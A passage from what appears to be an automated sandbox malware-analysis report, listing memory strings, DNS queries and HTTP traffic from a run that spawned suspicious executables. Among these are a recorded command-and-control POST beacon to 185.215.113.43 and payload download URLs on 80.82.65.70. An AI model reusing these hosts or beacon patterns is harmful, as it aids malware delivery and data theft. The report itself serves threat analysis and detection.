"://ads.stickyadstv.com/user-matching", "https://static.adsafeprotected.com/firefox-etp-pixel", "://.adsafeprotected.com/.gif", "://.adsafeprotected.com/.png", "://.adsafeprotected.com/.js", "://.adsafeprotected.com//adj", "://.adsafeprotected.com//imp/", "://.adsafeprotected.com//Serving/", "://.adsafeprotected.com//unit/", "://.adsafeprotected.com/jload", "://.adsafeprotected.com/jload?", "://.adsafeprotected.com/jsvid", "://.adsafeprotected.com/jsvid?", "://.adsafeprotected.com/mon", "://.adsafeprotected.com/tpl", "://.adsafeprotected.com/tpl?", "://.adsafeprotected.com/services/pub", "://.adsafeprotected.com/"], windowId:null}, ["blocking"]] equals www.facebook.com (Facebook)
Source: firefox.exe, 0000002C.00000002.2681975606.00000144AEC10000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: [{incognito:null, tabId:null, types:["xmlhttprequest"], urls:["://track.adform.net/Serving/TrackPoint/", "://pagead2.googlesyndication.com/pagead/.jsfcd=true", "://pagead2.googlesyndication.com/pagead/js/.jsfcd=true", "://pixel.advertising.com/firefox-etp", "://cdn.cmp.advertising.com/firefox-etp", "://.advertising.com/.js", "://.advertising.com/", "://securepubads.g.doubleclick.net/gampad/ad-blk", "://pubads.g.doubleclick.net/gampad/ad-blk", "://securepubads.g.doubleclick.net/gampad/xml_vmap1", "://pubads.g.doubleclick.net/gampad/xml_vmap1", "://vast.adsafeprotected.com/vast", "://securepubads.g.doubleclick.net/gampad/xml_vmap2", "://pubads.g.doubleclick.net/gampad/xml_vmap2", "://securepubads.g.doubleclick.net/gampad/ad", "://pubads.g.doubleclick.net/gampad/ad", "://www.facebook.com/platform/impression.php", "https://ads.stickyadstv.com/firefox-etp", "://ads.stickyadstv.com/auto-user-sync", "://ads.stickyadstv.com/user-matching", "https://static.adsafeprotected.com/firefox-etp-pixel", "https://static.adsafeprotected.com/firefox-etp-js", "://.adsafeprotected.com/.gif", "://.adsafeprotected.com/.png", "://.adsafeprotected.com/.js", "://.adsafeprotected.com//adj", "://.adsafeprotected.com//imp/", "://.adsafeprotected.com//Serving/", "://.adsafeprotected.com//unit/", "://.adsafeprotected.com/jload", "://.adsafeprotected.com/jload?", "://.adsafeprotected.com/jsvid", "://.adsafeprotected.com/jsvid?", "://.adsafeprotected.com/mon", "://.adsafeprotected.com/tpl", "://.adsafeprotected.com/tpl?", "://.adsafeprotected.com/services/pub", "://.adsafeprotected.com/*"], windowId:null}, ["blocking"]] equals www.facebook.com (Facebook)
Source: firefox.exe, 0000002C.00000002.2608378311.00000144A9003000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: findUpdates() - updateTask succeeded for KEY_PLUGIN_LAST_INSTALL_FAIL_REASON@mozilla.org/spellchecker/engine;1startup - adding gmp directory failed with ://pub.doubleverify.com/signals/pub.jsresource://gre/modules/addons/XPIProvider.jsm://static.chartbeat.com/js/chartbeat_video.js://static.criteo.net/js/ld/publishertag.js@mozilla.org/network/atomic-file-output-stream;1FileUtils_openSafeFileOutputStream://libs.coremetrics.com/eluminate.js://auth.9c9media.ca/auth/main.js://www.rva311.com/static/js/main..chunk.js://c.amazon-adsystem.com/aax2/apstag.js://connect.facebook.net//sdk.js://connect.facebook.net//all.js*://static.chartbeat.com/js/chartbeat.jsFileUtils_openAtomicFileOutputStreamhttps://smartblock.firefox.etp/facebook.svgresource://gre/modules/FileUtils.sys.mjsFileUtils_closeAtomicFileOutputStreamhttps://smartblock.firefox.etp/play.svg://.imgur.com/js/vendor..bundle.jsFileUtils_closeSafeFileOutputStreampictureinpicture%40mozilla.org:1.0.0webcompat-reporter@mozilla.org.xpi://www.everestjs.net/static/st.v3.jswebcompat-reporter%40mozilla.org:1.5.1://.imgur.io/js/vendor..bundle.js://track.adform.net/serving/scripts/trackpoint/@mozilla.org/addons/addon-manager-startup;1://web-assets.toggl.com/app/assets/scripts/.js@mozilla.org/network/file-output-stream;1resource://gre/modules/ConduitsParent.sys.mjs equals www.facebook.com (Facebook)
Source: firefox.exe, 0000002C.00000002.2679783197.00000144AEAE0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: www.facebook.com equals www.facebook.com (Facebook)
Source: firefox.exe, 0000002C.00000002.2682991190.00000144AED30000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: x://www.facebook.com/platform/impression.php equals www.facebook.com (Facebook)

Source: global traffic	DNS traffic detected: DNS query: drive.google.com
Source: global traffic	DNS traffic detected: DNS query: drive.usercontent.google.com
Source: global traffic	DNS traffic detected: DNS query: ipinfo.io
Source: global traffic	DNS traffic detected: DNS query: api.telegram.org
Source: global traffic	DNS traffic detected: DNS query: prod.classify-client.prod.webservices.mozgcp.net
Source: global traffic	DNS traffic detected: DNS query: youtube.com
Source: global traffic	DNS traffic detected: DNS query: detectportal.firefox.com
Source: global traffic	DNS traffic detected: DNS query: prod.detectportal.prod.cloudops.mozgcp.net
Source: global traffic	DNS traffic detected: DNS query: www.google.com
Source: global traffic	DNS traffic detected: DNS query: ntp.msn.com
Source: global traffic	DNS traffic detected: DNS query: bzib.nelreports.net
Source: global traffic	DNS traffic detected: DNS query: chrome.cloudflare-dns.com
Source: global traffic	DNS traffic detected: DNS query: support.mozilla.org
Source: global traffic	DNS traffic detected: DNS query: fightlsoser.click
Source: global traffic	DNS traffic detected: DNS query: us-west1.prod.sumo.prod.webservices.mozgcp.net
Source: global traffic	DNS traffic detected: DNS query: www.youtube.com
Source: global traffic	DNS traffic detected: DNS query: www.facebook.com
Source: global traffic	DNS traffic detected: DNS query: youtube-ui.l.google.com
Source: global traffic	DNS traffic detected: DNS query: star-mini.c10r.facebook.com
Source: global traffic	DNS traffic detected: DNS query: www.wikipedia.org
Source: global traffic	DNS traffic detected: DNS query: www.reddit.com
Source: global traffic	DNS traffic detected: DNS query: twitter.com
Source: global traffic	DNS traffic detected: DNS query: reddit.map.fastly.net
Source: global traffic	DNS traffic detected: DNS query: dyna.wikimedia.org
Source: global traffic	DNS traffic detected: DNS query: services.addons.mozilla.org
Source: global traffic	DNS traffic detected: DNS query: normandy.cdn.mozilla.net
Source: global traffic	DNS traffic detected: DNS query: normandy-cdn.services.mozilla.com

Source: unknown

HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s

Source: be08f59021.exe, 00000016.00000003.2961780018.00000000055A1000.00000004.00000020.00020000.00000000.sdmp, be08f59021.exe, 00000016.00000003.2836146510.00000000055A1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://80.82.65.70/dll/download
Source: be08f59021.exe, 00000016.00000003.2862278551.0000000005AAC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://80.82.65.70/files/download
Source: be08f59021.exe, 00000016.00000003.2961780018.00000000055A1000.00000004.00000020.00020000.00000000.sdmp, be08f59021.exe, 00000016.00000003.2836146510.00000000055A1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://80.82.65.70/files/download.V.m
Source: be08f59021.exe, 00000016.00000003.2961780018.00000000055A1000.00000004.00000020.00020000.00000000.sdmp, be08f59021.exe, 00000016.00000003.2836146510.00000000055A1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://80.82.65.70/files/downloadWl
Source: be08f59021.exe, 00000016.00000003.2961780018.00000000055A1000.00000004.00000020.00020000.00000000.sdmp, be08f59021.exe, 00000016.00000003.2836146510.00000000055A1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://80.82.65.70/files/downloadvY
Source: be08f59021.exe, 00000016.00000003.2961780018.00000000055A1000.00000004.00000020.00020000.00000000.sdmp, be08f59021.exe, 00000016.00000003.2836146510.00000000055A1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://80.82.65.70/files/downloadzV
Source: be08f59021.exe, 00000016.00000003.3058506798.0000000005AAC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://80.82.65.70/soft/download
Source: F0A3.tmp.ctx.exe, 0000001F.00000003.2420467057.00000234A0E3A000.00000004.00000020.00020000.00000000.sdmp, F0A3.tmp.ctx.exe, 0000001F.00000003.2419663756.00000234A0E3D000.00000004.00000020.00020000.00000000.sdmp, F0A3.tmp.ctx.exe, 0000001F.00000003.2402065480.00000234A0E31000.00000004.00000020.00020000.00000000.sdmp, F0A3.tmp.ctx.exe, 0000001F.00000003.2402307730.00000234A0E31000.00000004.00000020.00020000.00000000.sdmp, F0A3.tmp.ctx.exe, 0000001F.00000003.2417458765.00000234A0E31000.00000004.00000020.00020000.00000000.sdmp, F0A3.tmp.ctx.exe, 0000001F.00000003.2418005384.00000234A0E31000.00000004.00000020.00020000.00000000.sdmp, F0A3.tmp.ctx.exe, 0000001F.00000003.2415590920.00000234A0E31000.00000004.00000020.00020000.00000000.sdmp, F0A3.tmp.ctx.exe, 0000001F.00000003.2401707697.00000234A0E31000.00000004.00000020.00020000.00000000.sdmp, F0A3.tmp.ctx.exe, 0000001F.00000003.2420467057.00000234A0E31000.00000004.00000020.00020000.00000000.sdmp, F0A3.tmp.ctx.exe, 0000001F.00000003.2419663756.00000234A0E31000.00000004.00000020.00020000.00000000.sdmp, F0A3.tmp.ctx.exe, 0000001F.00000003.2401529035.00000234A0E31000.00000004.00000020.00020000.00000000.sdmp, F0A3.tmp.ctx.exe, 0000001F.00000003.2401908303.00000234A0E31000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: explorer.exe, 00000014.00000000.2216466843.000000000952D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000000.2216466843.00000000094DC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
Source: F0A3.tmp.ctx.exe, 0000001F.00000003.2420467057.00000234A0E3A000.00000004.00000020.00020000.00000000.sdmp, F0A3.tmp.ctx.exe, 0000001F.00000003.2419663756.00000234A0E3D000.00000004.00000020.00020000.00000000.sdmp, F0A3.tmp.ctx.exe, 0000001F.00000003.2402065480.00000234A0E31000.00000004.00000020.00020000.00000000.sdmp, F0A3.tmp.ctx.exe, 0000001F.00000003.2402307730.00000234A0E31000.00000004.00000020.00020000.00000000.sdmp, F0A3.tmp.ctx.exe, 0000001F.00000003.2417458765.00000234A0E31000.00000004.00000020.00020000.00000000.sdmp, F0A3.tmp.ctx.exe, 0000001F.00000003.2418005384.00000234A0E31000.00000004.00000020.00020000.00000000.sdmp, F0A3.tmp.ctx.exe, 0000001F.00000003.2415590920.00000234A0E3D000.00000004.00000020.00020000.00000000.sdmp, F0A3.tmp.ctx.exe, 0000001F.00000003.2415590920.00000234A0E31000.00000004.00000020.00020000.00000000.sdmp, F0A3.tmp.ctx.exe, 0000001F.00000003.2401707697.00000234A0E31000.00000004.00000020.00020000.00000000.sdmp, F0A3.tmp.ctx.exe, 0000001F.00000003.2420467057.00000234A0E31000.00000004.00000020.00020000.00000000.sdmp, F0A3.tmp.ctx.exe, 0000001F.00000003.2419663756.00000234A0E31000.00000004.00000020.00020000.00000000.sdmp, F0A3.tmp.ctx.exe, 0000001F.00000003.2401529035.00000234A0E31000.00000004.00000020.00020000.00000000.sdmp, F0A3.tmp.ctx.exe, 0000001F.00000003.2401908303.00000234A0E31000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
Source: firefox.exe, 0000002C.00000002.2602661602.00000144A8B7D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://compose.mail.yahoo.co.jp/ym/Compose?To=%s
Source: firefox.exe, 0000002C.00000002.2608378311.00000144A907C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://compose.mail.yahoo.co.jp/ym/Compose?To=%sresource://gre/modules/DeferredTask.sys.mjs
Source: firefox.exe, 0000002C.00000002.2608378311.00000144A907C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://compose.mail.yahoo.co.jp/ym/Compose?To=%sresource://gre/modules/DeferredTask.sys.mjsresource:
Source: F0A3.tmp.ctx.exe, 0000001F.00000003.2401331620.00000234A0E30000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.mic
Source: F0A3.tmp.ctx.exe, 0000001F.00000003.2401331620.00000234A0E30000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.micj
Source: F0A3.tmp.ctx.exe, 0000001F.00000003.2402065480.00000234A0E31000.00000004.00000020.00020000.00000000.sdmp, F0A3.tmp.ctx.exe, 0000001F.00000003.2402307730.00000234A0E31000.00000004.00000020.00020000.00000000.sdmp, F0A3.tmp.ctx.exe, 0000001F.00000003.2417458765.00000234A0E31000.00000004.00000020.00020000.00000000.sdmp, F0A3.tmp.ctx.exe, 0000001F.00000003.2418005384.00000234A0E31000.00000004.00000020.00020000.00000000.sdmp, F0A3.tmp.ctx.exe, 0000001F.00000003.2415590920.00000234A0E31000.00000004.00000020.00020000.00000000.sdmp, F0A3.tmp.ctx.exe, 0000001F.00000003.2401707697.00000234A0E31000.00000004.00000020.00020000.00000000.sdmp, F0A3.tmp.ctx.exe, 0000001F.00000003.2420467057.00000234A0E31000.00000004.00000020.00020000.00000000.sdmp, F0A3.tmp.ctx.exe, 0000001F.00000003.2419663756.00000234A0E31000.00000004.00000020.00020000.00000000.sdmp, F0A3.tmp.ctx.exe, 0000001F.00000003.2401529035.00000234A0E31000.00000004.00000020.00020000.00000000.sdmp, F0A3.tmp.ctx.exe, 0000001F.00000003.2401908303.00000234A0E31000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
Source: F0A3.tmp.ctx.exe, 0000001F.00000003.2420467057.00000234A0E3A000.00000004.00000020.00020000.00000000.sdmp, F0A3.tmp.ctx.exe, 0000001F.00000003.2419663756.00000234A0E3D000.00000004.00000020.00020000.00000000.sdmp, F0A3.tmp.ctx.exe, 0000001F.00000003.2402065480.00000234A0E31000.00000004.00000020.00020000.00000000.sdmp, F0A3.tmp.ctx.exe, 0000001F.00000003.2402307730.00000234A0E31000.00000004.00000020.00020000.00000000.sdmp, F0A3.tmp.ctx.exe, 0000001F.00000003.2417458765.00000234A0E31000.00000004.00000020.00020000.00000000.sdmp, F0A3.tmp.ctx.exe, 0000001F.00000003.2418005384.00000234A0E31000.00000004.00000020.00020000.00000000.sdmp, F0A3.tmp.ctx.exe, 0000001F.00000003.2415590920.00000234A0E31000.00000004.00000020.00020000.00000000.sdmp, F0A3.tmp.ctx.exe, 0000001F.00000003.2401707697.00000234A0E31000.00000004.00000020.00020000.00000000.sdmp, F0A3.tmp.ctx.exe, 0000001F.00000003.2420467057.00000234A0E31000.00000004.00000020.00020000.00000000.sdmp, F0A3.tmp.ctx.exe, 0000001F.00000003.2419663756.00000234A0E31000.00000004.00000020.00020000.00000000.sdmp, F0A3.tmp.ctx.exe, 0000001F.00000003.2401529035.00000234A0E31000.00000004.00000020.00020000.00000000.sdmp, F0A3.tmp.ctx.exe, 0000001F.00000003.2401908303.00000234A0E31000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
Source: explorer.exe, 00000014.00000000.2216466843.000000000952D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000000.2216466843.00000000094DC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
Source: F0A3.tmp.ctx.exe, 0000001F.00000003.2420467057.00000234A0E3A000.00000004.00000020.00020000.00000000.sdmp, F0A3.tmp.ctx.exe, 0000001F.00000003.2419663756.00000234A0E3D000.00000004.00000020.00020000.00000000.sdmp, F0A3.tmp.ctx.exe, 0000001F.00000003.2402065480.00000234A0E31000.00000004.00000020.00020000.00000000.sdmp, F0A3.tmp.ctx.exe, 0000001F.00000003.2402307730.00000234A0E31000.00000004.00000020.00020000.00000000.sdmp, F0A3.tmp.ctx.exe, 0000001F.00000003.2417458765.00000234A0E31000.00000004.00000020.00020000.00000000.sdmp, F0A3.tmp.ctx.exe, 0000001F.00000003.2418005384.00000234A0E31000.00000004.00000020.00020000.00000000.sdmp, F0A3.tmp.ctx.exe, 0000001F.00000003.2415590920.00000234A0E3D000.00000004.00000020.00020000.00000000.sdmp, F0A3.tmp.ctx.exe, 0000001F.00000003.2415590920.00000234A0E31000.00000004.00000020.00020000.00000000.sdmp, F0A3.tmp.ctx.exe, 0000001F.00000003.2401707697.00000234A0E31000.00000004.00000020.00020000.00000000.sdmp, F0A3.tmp.ctx.exe, 0000001F.00000003.2420467057.00000234A0E31000.00000004.00000020.00020000.00000000.sdmp, F0A3.tmp.ctx.exe, 0000001F.00000003.2419663756.00000234A0E31000.00000004.00000020.00020000.00000000.sdmp, F0A3.tmp.ctx.exe, 0000001F.00000003.2401529035.00000234A0E31000.00000004.00000020.00020000.00000000.sdmp, F0A3.tmp.ctx.exe, 0000001F.00000003.2401908303.00000234A0E31000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
Source: F0A3.tmp.ctx.exe, 0000001F.00000003.2420467057.00000234A0E3A000.00000004.00000020.00020000.00000000.sdmp, F0A3.tmp.ctx.exe, 0000001F.00000003.2419663756.00000234A0E3D000.00000004.00000020.00020000.00000000.sdmp, F0A3.tmp.ctx.exe, 0000001F.00000003.2402065480.00000234A0E31000.00000004.00000020.00020000.00000000.sdmp, F0A3.tmp.ctx.exe, 0000001F.00000003.2402307730.00000234A0E31000.00000004.00000020.00020000.00000000.sdmp, F0A3.tmp.ctx.exe, 0000001F.00000003.2417458765.00000234A0E31000.00000004.00000020.00020000.00000000.sdmp, F0A3.tmp.ctx.exe, 0000001F.00000003.2418005384.00000234A0E31000.00000004.00000020.00020000.00000000.sdmp, F0A3.tmp.ctx.exe, 0000001F.00000003.2415590920.00000234A0E31000.00000004.00000020.00020000.00000000.sdmp, F0A3.tmp.ctx.exe, 0000001F.00000003.2401707697.00000234A0E31000.00000004.00000020.00020000.00000000.sdmp, F0A3.tmp.ctx.exe, 0000001F.00000003.2420467057.00000234A0E31000.00000004.00000020.00020000.00000000.sdmp, F0A3.tmp.ctx.exe, 0000001F.00000003.2419663756.00000234A0E31000.00000004.00000020.00020000.00000000.sdmp, F0A3.tmp.ctx.exe, 0000001F.00000003.2401529035.00000234A0E31000.00000004.00000020.00020000.00000000.sdmp, F0A3.tmp.ctx.exe, 0000001F.00000003.2401908303.00000234A0E31000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: explorer.exe, 00000014.00000000.2216466843.000000000952D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000000.2216466843.00000000094DC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000000.2216466843.0000000009519000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
Source: F0A3.tmp.ctx.exe, 0000001F.00000003.2420467057.00000234A0E3A000.00000004.00000020.00020000.00000000.sdmp, F0A3.tmp.ctx.exe, 0000001F.00000003.2419663756.00000234A0E3D000.00000004.00000020.00020000.00000000.sdmp, F0A3.tmp.ctx.exe, 0000001F.00000003.2402065480.00000234A0E31000.00000004.00000020.00020000.00000000.sdmp, F0A3.tmp.ctx.exe, 0000001F.00000003.2402307730.00000234A0E31000.00000004.00000020.00020000.00000000.sdmp, F0A3.tmp.ctx.exe, 0000001F.00000003.2417458765.00000234A0E31000.00000004.00000020.00020000.00000000.sdmp, F0A3.tmp.ctx.exe, 0000001F.00000003.2418005384.00000234A0E31000.00000004.00000020.00020000.00000000.sdmp, F0A3.tmp.ctx.exe, 0000001F.00000003.2415590920.00000234A0E3D000.00000004.00000020.00020000.00000000.sdmp, F0A3.tmp.ctx.exe, 0000001F.00000003.2415590920.00000234A0E31000.00000004.00000020.00020000.00000000.sdmp, F0A3.tmp.ctx.exe, 0000001F.00000003.2401707697.00000234A0E31000.00000004.00000020.00020000.00000000.sdmp, F0A3.tmp.ctx.exe, 0000001F.00000003.2420467057.00000234A0E31000.00000004.00000020.00020000.00000000.sdmp, F0A3.tmp.ctx.exe, 0000001F.00000003.2419663756.00000234A0E31000.00000004.00000020.00020000.00000000.sdmp, F0A3.tmp.ctx.exe, 0000001F.00000003.2401529035.00000234A0E31000.00000004.00000020.00020000.00000000.sdmp, F0A3.tmp.ctx.exe, 0000001F.00000003.2401908303.00000234A0E31000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0L
Source: firefox.exe, 0000002C.00000002.2686204496.00000144AEECE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://detectportal.firefox.com
Source: firefox.exe, 0000002C.00000002.2681975606.00000144AEC1B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://detectportal.firefox.com/canonical.html
Source: firefox.exe, 0000002C.00000002.2681975606.00000144AEC1B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://detectportal.firefox.com/canonical.htmlshouldSkipCheckForuserenURLOrZeroSizedworkerAssociated
Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.0000000003256000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Base64Binary
Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.0000000003256000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#HexBinary
Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.0000000003256000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Text
Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.0000000003256000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd
Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.0000000003256000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd
Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.0000000003256000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-x509-token-profile-1.0#X509SubjectKeyIdentif
Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.0000000003256000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#GSS_Kerberosv5_AP_REQ
Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.0000000003256000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#GSS_Kerberosv5_AP_REQ1510
Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.0000000003256000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#Kerberosv5APREQSHA1
Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.0000000003256000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-rel-token-profile-1.0.pdf#license
Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.0000000003256000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.0#SAMLAssertionID
Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.0000000003256000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLID
Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.0000000003256000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLV1.1
Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.0000000003256000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLV2.0
Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.0000000003256000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#EncryptedKey
Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.0000000003256000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#EncryptedKeySHA1
Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.0000000003256000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#ThumbprintSHA1
Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.0000000003256000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-wssecurity-secext-1.1.xsd
Source: firefox.exe, 0000002C.00000003.2542860248.00000144AD0FE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002C.00000003.2542860248.00000144AD0DB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002C.00000002.2697661848.00000144AF351000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002C.00000002.2814264017.00000144B4E29000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002C.00000002.2648726496.00000144AD2CF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002C.00000002.2635101349.00000144ACA03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002C.00000002.2803265477.00000144B08F3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002C.00000002.2658271522.00000144AD5D5000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002C.00000002.2686204496.00000144AEE4E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002C.00000002.2634244627.00000144AC94C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002C.00000002.2639057942.00000144ACC3B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002C.00000002.2709016871.00000144AF8D0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002C.00000002.2709016871.00000144AF808000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mozilla.org/MPL/2.0/.
Source: explorer.exe, 00000014.00000000.2216466843.000000000952D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000000.2216466843.00000000094DC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0
Source: F0A3.tmp.ctx.exe, 0000001F.00000003.2420467057.00000234A0E3A000.00000004.00000020.00020000.00000000.sdmp, F0A3.tmp.ctx.exe, 0000001F.00000003.2419663756.00000234A0E3D000.00000004.00000020.00020000.00000000.sdmp, F0A3.tmp.ctx.exe, 0000001F.00000003.2402065480.00000234A0E31000.00000004.00000020.00020000.00000000.sdmp, F0A3.tmp.ctx.exe, 0000001F.00000003.2402307730.00000234A0E31000.00000004.00000020.00020000.00000000.sdmp, F0A3.tmp.ctx.exe, 0000001F.00000003.2417458765.00000234A0E31000.00000004.00000020.00020000.00000000.sdmp, F0A3.tmp.ctx.exe, 0000001F.00000003.2418005384.00000234A0E31000.00000004.00000020.00020000.00000000.sdmp, F0A3.tmp.ctx.exe, 0000001F.00000003.2415590920.00000234A0E31000.00000004.00000020.00020000.00000000.sdmp, F0A3.tmp.ctx.exe, 0000001F.00000003.2401707697.00000234A0E31000.00000004.00000020.00020000.00000000.sdmp, F0A3.tmp.ctx.exe, 0000001F.00000003.2420467057.00000234A0E31000.00000004.00000020.00020000.00000000.sdmp, F0A3.tmp.ctx.exe, 0000001F.00000003.2419663756.00000234A0E31000.00000004.00000020.00020000.00000000.sdmp, F0A3.tmp.ctx.exe, 0000001F.00000003.2401529035.00000234A0E31000.00000004.00000020.00020000.00000000.sdmp, F0A3.tmp.ctx.exe, 0000001F.00000003.2401908303.00000234A0E31000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0C
